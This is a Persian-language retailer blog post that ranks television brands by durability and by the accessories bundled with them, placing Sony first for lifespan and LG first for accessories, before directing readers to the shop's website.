معرفی برندهای معتبر تلویزیون ، طول عمر خود یکی از مؤلفه های مهم است که باید در هنگام خرید لوازم مد نظر قرار گیرد. بدون شک محصولاتی با کیفیت بیشتر دارای طول عمر بالاتری هم خواهند بود ، محصولاتی که کیفیت قطعاتشان تضمین کننده کارکرد خوب و سازگاری بالای آن ها است.

یک محصول با طول عمر بالا عبارت است از محصولی که کمترین آمار خرابی را دارا بوده و نیز قطعات یدکی آن به راحتی موجود و در دسترس باشند. با توجه به همه این ها ، همان طور که قبلا نیز بارها اشاره کردیم ، کیفیت یعنی سونی. بنابر این فهرست بهترین برند ها با توجه به طول عمر و آمار خرابی بدین شکل خواهد بود.

    برند سونی

معرفی برندهای معتبر تلویزیون ، بالاتر در همین پست آنقدر از تلویزیون های سونی و کیفیت آنها حرف زدیم که دیگر نیازی برای تکرار مکررات نمی بینیم و به همین بسنده می کنیم که محصولات تولیدی این برند به دلیل کیفیت و دقت بالایی که در ساخت داشته اند به ندرت خراب می شوند و در این صورت نیز قطعات مورد نیاز آن ها در بازار به وفور یافت می شود و پس از آن لیست اینگونه ادامه می یابد.

    برند فیلیپس

    برند سامسونگ

    برند پاناسونیک

    برند ال جی

    برند شارپ

    برند توشیبا

    برند تی سی ال

و…

بهترین برند از لحاظ به همراه داشتن لوازم جانبی

معرفی برندهای معتبر تلویزیون ، اقلام همراه عبارتند از اقلامی چون : عینک ، ریموت کنترل ، باطری ، کابل ها ،  تبدیل ها و …

برای نمونه تلویزیون های سونی از این حیثیت کمترین رتبه را دارند. زیرا همراه داشتن این اقلام باعث خواهد شد قیمت ها به مراتب بالاتر می رفته و خریداران توانایی خرید تلویزیون های سونی را نداشته باشند.به همین سبب شرکت سونی این اقلام را حذف کرده است.

با تواجه به اظهارات بالا ، می توان بهترین مارک تلویزیون ها را از لحاظ به همراه داشتن لوازم جانبی به صورت زیر مرتب سازی کرد :

    برند ال جی

معرفی برندهای معتبر تلویزیون ، همان طور که بالاتر نیز گفته شد ، برند ال جی در رتبه اول برندها در بخش پایین ترین قیمت ممکن قرار دارد لذا این مسئله دست ال جی را در ارائه لوازم جانبی همراه محصول باز می گذارد که این خود یکی از عوامل جاذبه کاربران به سوی این برند است. ال جی معمولا بیشترین تجهیزات جانبی را ، از کنترل های جادویی گرفته تا عینک های سه بعدی در اختیار کاربران خود می گذارد.

2. برند فیلیپس

معرفی برندهای معتبر تلویزیون ، فیلیپس نیز علاوه بر امکانات کاملی که عرضه میکند لوازم جانبی کامل بسته بندی شکیل و باکیفیت را ارائه میکند که باعث شده رتبه دوم قرار بگیرد …

سپس به ترتیب برندهای زیر را داریم :

    برند سامسونگ

    برند شارپ

    برند پاناسونیک

    برند سونی

نتیجه گیری

معرفی برندهای معتبر تلویزیون ، تلویزیون هم ساخته دست بشر است و هیچ یک از ساخته های بشر کامل وخالی از عیب و ایراد نبوده اند. چنان چه دقت کند هر برندی ویژگی های خوب و بد خود را دارا می باشد و هیچ برندی را نمی توان ذکر کرد که در تمای زمینه ها از رقبای خود پیشی گرفته و برتری مطلق را دارا باشند ، هر چند اگرچنین برندی هم وجود داشت باز نمی توانستیم ساخته های آن را مطلقا کامل و خالی از ایرادات عنوان کنیم.

به هر حال ما تا جایی که در توان داشتیم به خصوصیات و نقاط ضعف و قدرت برند های گوناگون پرداختیم و تصمیم گیری و انتخاب در این باره که کدام برند و کدام محصول تولیدی آن برند برای شما مناسب تر است. سوالی است که خود شما می بایست بسته به شرایط و ملاک های مد نظر خودتان به آن پاسخ دهید.

امیدواریم که این مطلب از وبلاگ خبری دوزین کالا برای شما عزیزان مفید بوده باشد و مورد عنایت و توجه شما عزیزان قرار گیرد.

لطفا ما را از نظرات و تشویق و انتقادات خود بی نصیب نگذارید.

شما می توانید جزئیات بیشتری را در رابطه با مدل های تلویزیون تولید شده هر برند و خصوصیات ، ویژگی ها و امکانات آن ها ، در وب سایت دوزین کالا مشاهده نمایید. همچنین در صورت تمایل می توانید در هر زمانی اقدام به خرید آن محصولات نمایید.

دکمه بازگشت به بالا